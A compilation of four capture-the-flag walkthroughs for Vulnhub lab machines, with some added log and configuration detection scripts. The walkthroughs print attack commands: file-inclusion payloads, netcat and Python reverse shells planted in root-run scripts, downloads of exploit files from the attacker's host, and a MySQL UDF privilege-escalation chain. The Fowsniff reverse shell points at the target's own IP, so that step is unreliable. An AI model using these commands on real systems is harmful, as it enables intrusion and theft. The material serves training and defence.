[Guide] Mercy: Vulnhub Walkthrough
MERCY is a machine dedicated to Offensive Security for the PWK course. MERCY is a name-play and has nothing to do with the contents of the vulnerable machine. You can download the Mercy vulnerable lab from Vulnhub. The challenge is to get root on the targeted virtual machine and read the proof.txt within that directory.

Flag: proof.txt
Table of Contents:
  • IP discovery and Port Scanning.
  • Browsing the IP on port 8080.
  • Decoding Base64 String.
  • Using Enum4linux tool for enumerating information of the Target Machine.
  • Getting Login Credentials to connect via smbclient.
  • Port Knocking.
  • Discovering accessible directories on the victim’s machine.
  • Browsing through the discovered directories.
  • Searching exploits via searchsploit.
  • Finding Login Credentials for Tomcat Server.
  • Logging into Tomcat Server using Metasploit.
  • Exploiting Misconfiguration in the Target Machine.
  • Using Msfvenom for creating payload one-liner.
  • Getting root access.
  • Reading the flag.
Let’s begin with the walkthrough!
Let’s start off by scanning the network to find our target’s IP.
netdiscover

[Image: 1.png?w=687&ssl=1]
We found our target IP: 192.168.1.105
Our next step is to scan the target IP with nmap.
nmap -A 192.168.1.105

[Image: 2.png?w=687&ssl=1]
The nmap output shows various open ports: 22 (ssh), 53 (domain), 80 (http), 110 (pop3), 139 (netbios-ssn), 143 (imap), 445 (netbios-ssn), 993 (ssl/imaps), 995 (ssl/pop3), 8080 (http).
Since port 80 is filtered we cannot browse the target IP directly in the browser. Further, we notice that port 8080 is open, running Apache Tomcat/Coyote JSP Engine 1.1, and robots.txt there gives us a clue: an entry /tryharder/tryharder that might come in handy later on.
So we browse the target IP on port 8080. At the end of the web page you notice the path “/etc/tomcat7/tomcat-users.xml”, the file in which Tomcat’s user accounts and passwords are defined.
[Image: 3.png?w=687&ssl=1]
On browsing to the discovered entry /tryharder/tryharder, we got a base64 encoded string.
Clearly we need to decode it to move ahead.
[Image: 5.png?w=687&ssl=1]
On decoding the base64 string we found some Login Credentials which can be of great use later on.
[Image: 6.png?w=687&ssl=1]
Since port 445 is open on the target machine, we thought of enumerating it using the enum4linux tool.
enum4linux 192.168.1.105

It gave us a few shared folders which can be further used to connect via smbclient.
[Image: 7.png?w=687&ssl=1]
Now we connect via smbclient using the credentials “qiu:password”.
smbclient \\\\192.168.1.105\\qiu -U qiu

Exploring the share’s directories further, we downloaded the config file to our Linux desktop.
[Image: 8.png?w=687&ssl=1]
Reading the contents of the config file gave us a sequence of ports to knock, which results in http port 80 being opened.
cat config

[Image: 9.png?w=687&ssl=1]
Knocking the sequence of ports using the following command:
knock 192.168.1.105 159 27391 4
nmap 192.168.1.105

From the nmap scan we confirmed that http port 80 opened after the knock.
[Image: 10.png?w=687&ssl=1]
Since port 80 was now open, we browsed the target IP, which displayed the message you can see in the image; it turned out to be of no use in proceeding towards our goal.
[Image: 11.png?w=687&ssl=1]
Now we thought of enumerating for accessible directories on the Target Machine.
dirb http://192.168.1.105
[Image: 12.png?w=687&ssl=1]
Browsing the robots.txt file gave us two disallowed hidden directories, as shown in the image.
[Image: 13.png?w=687&ssl=1]
Browsing the directory 192.168.1.105/nomercy opened a vulnerability scanner web page whose banner, RIPS 0.53, left us curious to search for more about it.
[Image: 14.png?w=687&ssl=1]
Then, when we searched for RIPS 0.53 in searchsploit, it came out to be a Multiple Local File Inclusions exploit. Next, we copied the exploit to our Linux desktop and read the text file. Here we also copied the one-liner /windows/code.php?file=../../../../../../etc/passwd.
searchsploit rips 0.53

[Image: 15.png?w=687&ssl=1]
We used the LFI to take a look at the content of the passwd file, as shown in the PoC.
192.168.1.105/nomercy/windows/code.php?file=../../../../../../etc/passwd

[Image: 16.png?w=687&ssl=1]
Since we know there is a Tomcat service running on the target system, we can take a look at the tomcat-users.xml file using the same LFI; it holds the username and password. Opening it in the browser gave us two sets of login credentials for the Tomcat server, as shown in the image.
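As an added defender-side example (not part of the original walkthrough), the following Python scans Apache-style access log lines for the kind of ../ and double-encoded file= requests used above and reports the parameter, the decoded target and why it was flagged; the log lines are constructed samples, not a capture from the Mercy VM.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines modelled on the RIPS 0.53 LFI requests
# in the walkthrough (sample data, not a real capture).
SAMPLE_ACCESS_LOG = """\
192.168.1.109 - - [15/Nov/2018:10:01:02 +0000] "GET /nomercy/windows/code.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2314 "-" "Mozilla/5.0"
192.168.1.109 - - [15/Nov/2018:10:01:40 +0000] "GET /nomercy/windows/code.php?file=..%2F..%2F..%2F..%2Fetc%2Ftomcat7%2Ftomcat-users.xml HTTP/1.1" 200 1780 "-" "Mozilla/5.0"
192.168.1.50 - - [15/Nov/2018:10:02:15 +0000] "GET /nomercy/windows/code.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2314 "-" "curl/7.61.0"
192.168.1.77 - - [15/Nov/2018:10:03:00 +0000] "GET /nomercy/windows/code.php?file=help.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.77 - - [15/Nov/2018:10:03:05 +0000] "GET /index.html HTTP/1.1" 200 98 "-" "Mozilla/5.0"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Files an LFI is typically steered at; the walkthrough reads two of them.
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml", "wp-config.php")


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (double-encoding is a common filter bypass)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_indicators(value):
    """Return the reasons a single parameter value looks like path traversal / LFI."""
    v = fully_decode(value).replace("\\", "/")
    reasons = []
    hops = v.count("../")
    if hops:
        reasons.append(f"traversal (../ x{hops})")
    if "\x00" in v:
        reasons.append("null byte")
    for name in SENSITIVE_FILES:
        if name in v.lower():
            reasons.append(f"sensitive target {name}")
    return reasons


def scan_access_log(text):
    """Flag requests whose query parameters carry traversal or LFI indicators."""
    alerts = []
    for line in text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # parse_qsl percent-decodes once; fully_decode() handles further layers
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            reasons = traversal_indicators(val)
            if reasons:
                alerts.append({"ip": m.group("ip"), "path": url.path, "param": key,
                               "value": fully_decode(val),
                               "status": int(m.group("status")), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f'{a["ip"]} {a["path"]}?{a["param"]}= {a["value"]} -> {", ".join(a["reasons"])}')
```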
[Image: 17.png?w=687&ssl=1]
Logging into the Tomcat server using Metasploit’s Tomcat Manager upload module with the credentials “thisisasuperduperlonguser:heartbreakisinevitable”.
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.105
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername thisisasuperduperlonguser
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword heartbreakisinevitable
msf exploit(multi/http/tomcat_mgr_upload) > exploit

Now using a one-liner to spawn a tty shell:
python -c 'import pty; pty.spawn("/bin/bash")'

Further, logging in as user fluffy.
su fluffy
Password: freakishfluffybunny

[Image: 18.png?w=687&ssl=1]
While traversing /home/fluffy/.private/secrets I noticed a script “timeclock” that writes the current date to /var/www/html/time; it was owned by root and had full permissions.
cd /home
ls
cd fluffy
ls -la
cd .private
ls -la
cd secrets

Since the script runs every three minutes, we decided to edit this file by inserting our malicious code into it.
[Image: 19.png?w=687&ssl=1]
Moving on! We need to create a bash payload using msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=8888 R

[Image: 20.png?w=687&ssl=1]
After that, append the above-generated code to the timeclock file.
echo "mkfifo /tmp/zlat; nc 192.168.1.109 8888 0</tmp/zlat | /bin/sh >/tmp/zlat 2>&1; rm /tmp/zlat" >>timeclock

[Image: 21.png?w=687&ssl=1]
Since the malicious code was executed along with the timeclock file, we got a reverse shell on our netcat listener. To spawn a proper shell we used the python /bin/bash one-liner.
python -c 'import pty; pty.spawn("/bin/bash")'

Booyah! We have got root access and found proof.txt. We took a look at the content of the file and were greeted with a congratulatory message.
[Image: 22.png?w=687&ssl=1]

FourAndSix: 2 is the sequel to the previously solved vulnerable machine FourAndSix by Fred, uploaded on Vulnhub. It is not mandatory, but it is advised to read the prequel of this lab. You can download the FourAndSix:2 vulnerable lab from Vulnhub. The challenge is to become root and read flag.txt in the same directory.

Table of Contents:
  • Discovery of IP address.
  • Scanning for open ports and services.
  • Discovering universally accessible directory in the victim’s machine.
  • Cracking the password of archive found in the storage partition.
  • Reading the pub file and logging in using ssh.
  • Discovering utilities with sticky bit on them.
  • Using doas to get root.
  • Snagging the flag!
Let’s get started then.
The first step is, as usual, to find the IP of the target machine using netdiscover. In this case it is 192.168.1.103.
[Image: 1.png?w=687&ssl=1]
Next, we discover open ports and services using nmap.

nmap -A 192.168.1.103

The ports open were 22, 111, 2049.
[Image: 2.png?w=687&ssl=1]
There was only one way to proceed, and that is port 2049. So we used the showmount command to check for NFS shared partitions.
Later, we mounted it under a folder named “raj” using the mount command, and found a 7z compressed file.
showmount -e 192.168.1.103
mount -t nfs 192.168.1.103:/home/user/storage raj

[Image: 3.png?w=687&ssl=1]
But the file “backup.7z” was, unfortunately, password protected.
[Image: 4.png?w=687&ssl=1]
So, after trying a number of options like John the Ripper with zero success, we found a site online to break its password.
The password was: chocolate
[Image: 5.png?w=687&ssl=1]
We extracted its contents into the same folder and found a few images along with RSA keys. As port 22 is running the SSH service on the target machine, we can use the RSA private key to log in. We open the RSA public key to take a look at the username.
cat id_rsa.pub

[Image: 6.png?w=687&ssl=1]
We tried logging in to ssh but it asked for a passphrase. So, we wrote the following script to find the correct password: ssh-keygen -c (change comment) only succeeds when the passphrase given with -P unlocks the key, so the loop stops at the first word that works.
while read -r pass; do
  if ssh-keygen -c -C "user@forandsix" -P "$pass" -f id_rsa &>/dev/null; then
    echo "$pass"
    break
  fi
done < /usr/share/wordlists/metasploit/adobe_top100_pass.txt

[Image: 8.png?w=687&ssl=1]
From the id_rsa.pub file we found the username for the secure shell of the victim and logged in to it. The password was “12345678”.
ssh -i id_rsa user@192.168.1.103

We used the find utility to discover files with the SUID bit set.
find / -perm -u=s -type f 2>/dev/null

We found an interesting utility with the SUID bit: /usr/bin/doas, which is an alternative to sudo.
After reading the “doas.conf” file, we find that “less” can be run as root.
[Image: 9.png?w=687&ssl=1]
Let’s pick up the configuration file and try to understand it word by word. The doas utility executes commands as other users according to the rules in the doas.conf configuration file.
  • permit/deny: allows or refuses the rule.
  • nopass: the user is not required to enter any password.
  • persist: after the user successfully authenticates, do not ask for a password again for some time.
  • keepenv: the user’s environment is maintained.
  • cmd: the command that is allowed to run.
Since the doas configuration file says that less can be run as root with no password at all, it can be used for shell escaping.
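An added example, not from the original post: a small Python audit of doas.conf that applies doas’s last-matching-rule semantics and flags permit-as-root rules that are nopass or hand out a pager/editor able to escape to a shell, as less does here. The sample configuration is an assumption written to match what the walkthrough describes (the real file on the VM is not shown), and setenv blocks are not parsed.

```python
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed doas.conf in the spirit of the FourAndSix:2 box; the walkthrough
# only says "less" may be run as root without a password, the rest is assumed.
SAMPLE_DOAS_CONF = """\
# wheel members may run anything, re-authenticating only after the persist window
permit persist keepenv :wheel
# the finding from the box: less as root, no password
permit nopass user as root cmd /usr/bin/less
# explicit denial (matters only if a later rule would otherwise permit it)
deny user as root cmd /bin/sh
"""

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


@dataclass
class Rule:
    action: str                       # permit | deny
    options: Set[str]
    identity: str                     # "name" or ":group"
    target: str = "root"              # doas defaults the target user to root
    cmd: Optional[str] = None         # None = any command
    args: Optional[List[str]] = None  # None = any arguments


def parse_doas_conf(text: str) -> List[Rule]:
    """Parse permit/deny rules; 'setenv { ... }' blocks are not handled here."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tok = line.split()
        action = tok.pop(0)
        if action not in ("permit", "deny"):
            raise ValueError(f"unknown action {action!r}")
        options = set()
        while tok and tok[0] in OPTIONS:
            options.add(tok.pop(0))
        identity = tok.pop(0)
        target, cmd, args = "root", None, None
        if tok and tok[0] == "as":
            tok.pop(0)
            target = tok.pop(0)
        if tok and tok[0] == "cmd":
            tok.pop(0)
            cmd = tok.pop(0)
            if tok and tok[0] == "args":
                tok.pop(0)
                args = tok  # may be an empty list, meaning "no arguments allowed"
        rules.append(Rule(action, options, identity, target, cmd, args))
    return rules


def matches(rule, user, groups, target, cmd, args):
    if rule.identity.startswith(":"):
        if rule.identity[1:] not in groups:
            return False
    elif rule.identity != user:
        return False
    if rule.target != target or (rule.cmd is not None and rule.cmd != cmd):
        return False
    return rule.args is None or rule.args == list(args)


def evaluate(rules, user, groups, cmd, args=(), target="root"):
    """doas semantics: the LAST matching rule decides; no match means deny."""
    decision = None
    for rule in rules:
        if matches(rule, user, groups, target, cmd, args):
            decision = rule
    if decision is None or decision.action == "deny":
        return ("deny", set())
    return ("permit", set(decision.options))


# Pagers/editors that can drop to a shell, as the walkthrough does with less -> v -> :!sh
SHELL_CAPABLE = {"/usr/bin/less", "/usr/bin/more", "/usr/bin/vi", "/usr/bin/vim", "/usr/bin/man"}


def audit(rules) -> List[Tuple[int, str]]:
    """Flag permit-as-root rules that hand out an unrestricted or shell-capable command."""
    findings = []
    for n, r in enumerate(rules, 1):
        if r.action != "permit" or r.target != "root":
            continue
        if r.cmd is None:
            findings.append((n, f"{r.identity}: any command as root"))
        elif r.cmd in SHELL_CAPABLE and r.args is None:
            findings.append((n, f"{r.identity}: {r.cmd} as root can escape to a shell"))
        if "nopass" in r.options:
            findings.append((n, f"{r.identity}: nopass removes the password check"))
    return findings
```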
doas /usr/bin/less /var/log/authlog

[Image: 10.png?w=687&ssl=1]
Press v to escape to vi and then type “:!sh” to escape to our brand new shell.
[Image: 11.png?w=687&ssl=1]
The final step was to snag the flag! It was in the root directory, as told by the creator of the VM.
id shows that the shell is a root shell, and finally we read the congratulatory flag using cat!
[Image: 12.png?w=687&ssl=1]
So this was how we rooted FourAndSix:2. Hope you liked it.

Hello everyone, and welcome to yet another CTF challenge walkthrough. This time we’ll be putting our hands on Raven 2. It is the sequel to the previously solved Raven. Raven 2 is a Beginner/Intermediate boot2root machine. The goal is to snag 4 flags and get root on the target VM.
Table of Contents:
  1. Port scanning and IP discovery.
  2. Hitting on port 80 and the discovery of WordPress CMS.
  3. Directory enumeration to find a directory “vendor.”
  4. Discovering a file PATH to snag flag 1.
  5. Discovering a file VERSION to snag the PHP version.
  6. Exploiting RCE in PHP version 5.2.6
  7. Making local changes in the exploit code for the successful delivery of the payload.
  8. Getting a netcat shell using the uploaded payload.
  9. Snagging flag 2 in /var/www
  10. Reading database password from the wp-config file.
  11. Running LinEnum.sh to enumerate processes.
  12. Exploiting UDF dynamic library vulnerability using an exploit with codename 1518.c on exploit-db
  13. Setting sticky bit on the find.
  14. Getting root access.
  15. Snagging flag4 in /root
  16. Manually traversing system to find flag3.
Let’s get started then!
Discovering the active devices on the network using netdiscover, we got the IP address of our victim machine. In this case the IP address is 192.168.1.101.
[Image: 1.png?w=687&ssl=1]
Using nmap on the victim machine we found three ports open: 22, 80 and 111.
nmap -A 192.168.1.101

[Image: 2.png?w=687&ssl=1]
So we instantly moved to port 80 and discovered a website of Raven Security.
[Image: 3.png?w=687&ssl=1]
We thought it would be wise to run a directory test before we scanned anything else. So we ran a directory buster test and found the “vendor” directory on the victim machine.
dirb http://192.168.1.101
[Image: 4.png?w=687&ssl=1]
Accessing /vendor, the following files and folders came out.
[Image: 5.png?w=687&ssl=1]
Among them, a file called PATH caught our attention since it is no ordinary name. So we opened it in the browser only to find flag1!
[Image: 6.png?w=687&ssl=1]
There was yet another file worth noting, called VERSION. On opening it we found the version of something. It was unclear which software had version 5.2.6, but look at the previous screen again: a file exists called PHPMailerAutoload.php. It is fairly certain now that version 5.2.6 is PHPMailer’s. So, after a bit of internet surfing, we found an RCE exploit for that version!
[Image: 7.png?w=687&ssl=1]
Now we downloaded this python file, but don’t run it yet! There are some changes to be made, which are highlighted in the screen below.
  1. A coding: utf-8 tag is to be added at the top.
  2. Set the target of the vulnerability to 192.168.1.101/contact.php, where this vulnerability exists (the page that calls PHPMailer’s function).
  3. Set the backdoor’s name. Let it be backdoor.php for now.
  4. Set the local IP in the subprocess call.
  5. And finally, the location to upload the backdoor to.
[Image: 8.png?w=687&ssl=1]
Now run this python script and wait for the success message.
[Image: 9.png?w=687&ssl=1]
Activate a netcat listener on port 443, because the backdoor connects back on port 443, as written in the python code (subprocess call).
[Image: 10.png?w=687&ssl=1]
Upon opening the location of the backdoor we immediately got a shell!
Now we spawned a proper teletype using the python one-liner and manually traversed to /var/www, only to discover flag2!
python -c 'import pty;pty.spawn("/bin/bash")'
cd /var/www
cat flag2.txt

Now we thought of checking the WordPress directory as we did in the prequel Raven 1.
cd html
cd wordpress
cat wp-config.php

We found the root database password! It was “R@v3nSecurity”
[Image: 11.png?w=687&ssl=1]
Then we changed the working directory to /tmp and imported LinEnum.sh, a script that enumerates many basic and advanced Linux details.
It was hosted in a folder on our local machine and was pulled into the victim machine using the wget command.
My local IP address was 192.168.1.109 in this case.
cd /tmp
wget http://192.168.1.109/<folder>/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh

[Image: 12.0.png?w=687&ssl=1]
We found a MySQL-Exploit-Remote-Root-Code-Execution-Privesc vulnerability!

[Image: 12.1.png?w=687&ssl=1]
So we searched for a UDF dynamic library exploit, and it was named “1518.c” in the exploit database.
[Image: 12.2.png?w=687&ssl=1]
The exploit works by compiling the raw C code to a “.so” file, transferring it to the victim machine and then using it to exploit the MySQL vulnerability.
The first step was to compile it.
searchsploit -m 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc

[Image: 12.png?w=687&ssl=1]
Hence, we transferred this “.so” file to the /tmp directory on the victim’s machine.
wget http://192.168.1.109/<folder>/1518.so
chmod 777 1518.so

[Image: 12.png?w=687&ssl=1]
Now we logged in to the MySQL interface.
mysql -u root -p

<entered password>
After getting a MySQL shell, we started exploiting it using the vulnerability we just found.
use mysql;

Now we created a table called “foo”.
In this table we inserted the contents of the 1518.so file we just imported from the local machine into the /tmp directory.
We dumped the same file to the /usr/lib/mysql/plugin/ directory (since it was vulnerable).
In the most important step, we created a UDF function named do_system that invokes the code implementing the function.
Hence, we invoke the code “chmod u+s /usr/bin/find” to set the setuid (SUID) bit on “find”.
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
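Added detection example (not from the original walkthrough): the chain above leaves a recognisable trail in the MySQL general query log: load_file() into a table, INTO DUMPFILE under the plugin directory, CREATE FUNCTION ... SONAME, then a call to the new UDF. This Python groups those stages by connection thread over a constructed log excerpt (sample data modelled on the queries above) and alerts when one thread performs more than one of them.

```python
import re
from collections import defaultdict

# Constructed MySQL general-log excerpt mirroring the walkthrough's UDF chain,
# plus an unrelated WordPress query on another thread (sample data, not a real log).
SAMPLE_GENERAL_LOG = """\
2018-11-15T10:02:11.000000Z     5 Query     use mysql
2018-11-15T10:02:30.000000Z     5 Query     create table foo(line blob)
2018-11-15T10:02:41.000000Z     5 Query     insert into foo values(load_file('/tmp/1518.so'))
2018-11-15T10:02:55.000000Z     5 Query     select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'
2018-11-15T10:03:10.000000Z     5 Query     create function do_system returns integer soname '1518.so'
2018-11-15T10:03:20.000000Z     5 Query     select do_system('chmod u+s /usr/bin/find')
2018-11-15T10:05:00.000000Z     7 Query     select id, post_title from wp_posts limit 5
2018-11-15T10:05:02.000000Z     7 Quit
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Each stage of the "write a shared object through MySQL, register it as a UDF" chain.
STAGES = [
    ("load_file",   re.compile(r"\bload_file\s*\(", re.I)),
    ("dump_plugin", re.compile(r"\binto\s+(dumpfile|outfile)\s+'[^']*/plugin/[^']*'", re.I)),
    ("create_udf",  re.compile(r"\bcreate\s+(or\s+replace\s+)?(aggregate\s+)?function\s+"
                               r"(?P<name>\w+)\s+returns\s+\w+\s+soname\s+'", re.I)),
]


def parse_general_log(text):
    """Yield (timestamp, thread id, query text) for Query entries only."""
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m and m.group("cmd") == "Query":
            yield m.group("ts"), int(m.group("thread")), m.group("arg").strip()


def detect_udf_chain(text, min_stages=2):
    """Return one alert per thread that performed >= min_stages distinct stages."""
    hits = defaultdict(list)   # thread -> [(stage, ts, query)]
    udf_names = {}             # udf name -> thread that created it
    for ts, thread, query in parse_general_log(text):
        for stage, rx in STAGES:
            m = rx.search(query)
            if m:
                hits[thread].append((stage, ts, query))
                if stage == "create_udf":
                    udf_names[m.group("name").lower()] = thread
        # a call to any UDF registered earlier in the log is the final stage
        for name in udf_names:
            if re.search(rf"\b{re.escape(name)}\s*\(", query, re.I):
                hits[thread].append(("udf_call", ts, query))
    alerts = []
    for thread, events in sorted(hits.items()):
        stages = {s for s, _, _ in events}
        if len(stages) >= min_stages:
            alerts.append({"thread": thread, "stages": stages,
                           "first": events[0][1], "last": events[-1][1],
                           "queries": [q for _, _, q in events]})
    return alerts


if __name__ == "__main__":
    for a in detect_udf_chain(SAMPLE_GENERAL_LOG):
        print(f"thread {a['thread']}: {sorted(a['stages'])} between {a['first']} and {a['last']}")
```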

[Image: 13.png?w=687&ssl=1]
Now we traversed back to the /tmp directory and executed commands using the find utility.
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
cd /root
ls
cat flag4.txt

[Image: 14.png?w=687&ssl=1]
The only flag left to find was flag3.txt. You can do this with the find utility, but we had a bit of luck and found it manually!
It was lying in /var/www/html/wp-content/uploads/2018/11.
We copied it to /var/www/html using cp.
[Image: 15.png?w=687&ssl=1]
Since it was a png file we had to view it in the browser.
[Image: 16.png?w=687&ssl=1]
Hence, this is how we rooted Raven 2 and snagged all four flags! Hope you liked it!

Hello friends! Today we are going to take on another boot2root challenge known as Fowsniff. The credit for making this VM goes to “berzerk0”, and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM from Vulnhub.

Security Level: Beginner
Flags: There is one flag (flag.txt).
Table of Contents:
  • Port scanning and IP discovery.
  • Hitting on port 80
  • Finding hashes on Pastebin
  • Decoding hashes
  • Brute force pop3 login
  • Connecting to pop3
  • Finding SSH username and password
  • Finding privilege escalation vectors
  • Exploiting Misconfiguration in system
  • Getting root access.
  • Reading the flags.
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

[Image: 1.png?w=687&ssl=1]
We found our target –> 192.168.1.29
Our next step is to scan our target with nmap.
nmap -A -p- -T4 192.168.1.29

[Image: 2.png?w=687&ssl=1]
The nmap output shows us that there are 4 ports open: 22 (SSH), 80 (HTTP), 110 (POP3), 143 (IMAP).
Port 80 is running HTTP, so we open the IP in our browser.
[Image: 3.png?w=687&ssl=1]
We don’t find anything on the web page. A dirb scan and Nikto also didn’t reveal anything, so we googled “fowsniff corp” and found a Pastebin link that contained usernames and password hashes.

[Image: 4.png?w=687&ssl=1]
We cracked the hashes using an online cracking site and found the passwords for the respective email addresses. But only 8 hashes were cracked, and there are 9 usernames.

[Image: 5.png?w=687&ssl=1]
So we create two wordlists, one for usernames and one for passwords; we will use these to brute force the pop3 login.
[Image: 6.png?w=687&ssl=1]
We use the Metasploit framework to brute force the pop3 login. After running the brute force we find the correct credentials to be “seina:scoobydoo2”.
msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29
msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
msf auxiliary(scanner/pop3/pop3_login) > run

[Image: 7.png?w=687&ssl=1]
We connect to the pop3 service on the target server and log in using the credentials we retrieved. After logging in we list the messages and find there are 2 of them.
nc 192.168.1.29 110
user seina
pass scoobydoo2
list

[Image: 8.png?w=687&ssl=1]
We retrieved the first message and find that it contains the password to connect through SSH.
retr 1

[Image: 9.png?w=687&ssl=1]
We retrieved the second message and find a hint to use the username “baksteen”.
retr 2

[Image: 10.png?w=687&ssl=1]
We use the credentials “baksteen:S1ck3nBluff+secureshell” to log in through SSH.
ssh baksteen@192.168.1.29

[Image: 11.png?w=687&ssl=1]
After gaining access we enumerate the system; user “baksteen” belongs to two different groups. We try to find files that belong to the “users” group and find a file called “cube.sh”.
find / -group users -type f 2>/dev/null

[Image: 12.png?w=687&ssl=1]
We take a look at the content of the file and find it contains the message that appears once we log in through SSH.
cd /opt/cube
cat cube.sh

[Image: 13.png?w=687&ssl=1]
We open the file with vim and add a python reverse shell one-liner to it.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[Image: 14.png?w=687&ssl=1]
We try to run it and find it gives the error “python: command not found”. We try to locate Python and find that the system has python3.
[Image: 15.png?w=687&ssl=1]
So we change the python reverse shell one-liner, replacing python with python3.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.29",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[Image: 16.png?w=687&ssl=1]
When we log in through SSH we get a banner similar to the one “cube.sh” contains. So we check the “/etc/update-motd.d/” directory for executables that might run this program and find that the file “00-header” runs this shell script.
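Both the Mercy timeclock script (root-owned, full permissions, run every three minutes) and the Fowsniff cube.sh (group-writable, executed through /etc/update-motd.d/00-header at every login) share one root cause: a file that runs as root but can be modified by an ordinary user. As an added example that is not part of the original post, this Python audit walks root-executed entry points and the scripts they reference and reports anything writable by an untrusted uid or gid; it builds a constructed replica of both setups in a temporary directory, so the paths and file contents are assumptions.

```python
import os
import re
import stat
import tempfile

# Absolute paths inside a script body (heuristic: enough to follow 00-header -> cube.sh)
ABS_PATH = re.compile(r"(?<![\w./-])(/[\w./-]+)")


def untrusted_write_reasons(st, trusted_uids, trusted_gids):
    """Why a file with this stat could be rewritten by someone who is not root."""
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append(f"owned by uid {st.st_uid}, not a trusted owner")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif st.st_mode & stat.S_IWGRP and st.st_gid not in trusted_gids:
        reasons.append(f"group-writable (gid {st.st_gid})")
    return reasons


def referenced_scripts(path):
    """Existing absolute paths mentioned in a script body; comments are ignored."""
    refs = []
    try:
        with open(path, errors="replace") as fh:
            for line in fh:
                code = line.split("#", 1)[0]
                for candidate in ABS_PATH.findall(code):
                    if os.path.isfile(candidate) and candidate not in refs:
                        refs.append(candidate)
    except OSError:
        pass
    return refs


def audit_root_hooks(entry_points, trusted_uids=(0,), trusted_gids=(0,), max_depth=3):
    """Check each root-executed entry point (cron job, update-motd.d snippet) and
    the scripts it calls; return {path: [reasons]} for anything a non-root user
    could modify. Defaults treat only uid/gid 0 as trusted."""
    findings, seen = {}, set()
    stack = [(p, 0) for p in entry_points]
    while stack:
        path, depth = stack.pop()
        if path in seen:
            continue
        seen.add(path)
        try:
            st = os.stat(path)
        except OSError:
            continue
        reasons = untrusted_write_reasons(st, trusted_uids, trusted_gids)
        if reasons:
            findings[path] = reasons
        if depth < max_depth:
            stack.extend((r, depth + 1) for r in referenced_scripts(path))
    return findings


def build_demo():
    """Constructed replica of both walkthrough setups inside a temp directory:
    a 'timeclock' with mode 777 (Mercy) and an update-motd.d style '00-header'
    that runs a group-writable 'cube.sh' (Fowsniff); '99-footer' is a safe control."""
    root = tempfile.mkdtemp()

    def write(name, body, mode):
        p = os.path.join(root, name)
        with open(p, "w") as fh:
            fh.write(body)
        os.chmod(p, mode)
        return p

    cube = write("cube.sh", "#!/bin/sh\necho 'Fowsniff Corp banner'\n", 0o664)
    header = write("00-header", f"#!/bin/sh\nsh {cube}\n", 0o755)
    timeclock = write("timeclock", "#!/bin/sh\ndate > /var/www/html/time\n", 0o777)
    safe = write("99-footer", "#!/bin/sh\nuptime\n", 0o755)
    return header, timeclock, safe


def demo():
    """Run the audit on the replica; the current user plays root, every group is untrusted."""
    entry_points = build_demo()
    found = audit_root_hooks(entry_points, trusted_uids=(os.getuid(),), trusted_gids=())
    return {os.path.basename(p): r for p, r in found.items()}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name}: {'; '.join(reasons)}")
```

On a real host the entry points would be the cron scripts and /etc/update-motd.d/* files, with the default trusted uid/gid of 0.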
[Image: 17.1.png?w=687&ssl=1]
So now we exit SSH, set up our listener using netcat, and then connect through SSH again so that our reverse shell gets executed.
ssh baksteen@192.168.1.29

[Image: 17.png?w=687&ssl=1]
As soon as we successfully log in, we get a reverse shell as the root user on our netcat listener. We go to the root directory and find the file “flag.txt”. We take a look at its content and find the congratulatory message.
nc -lvp 1234
id
cd /root
cat flag.txt

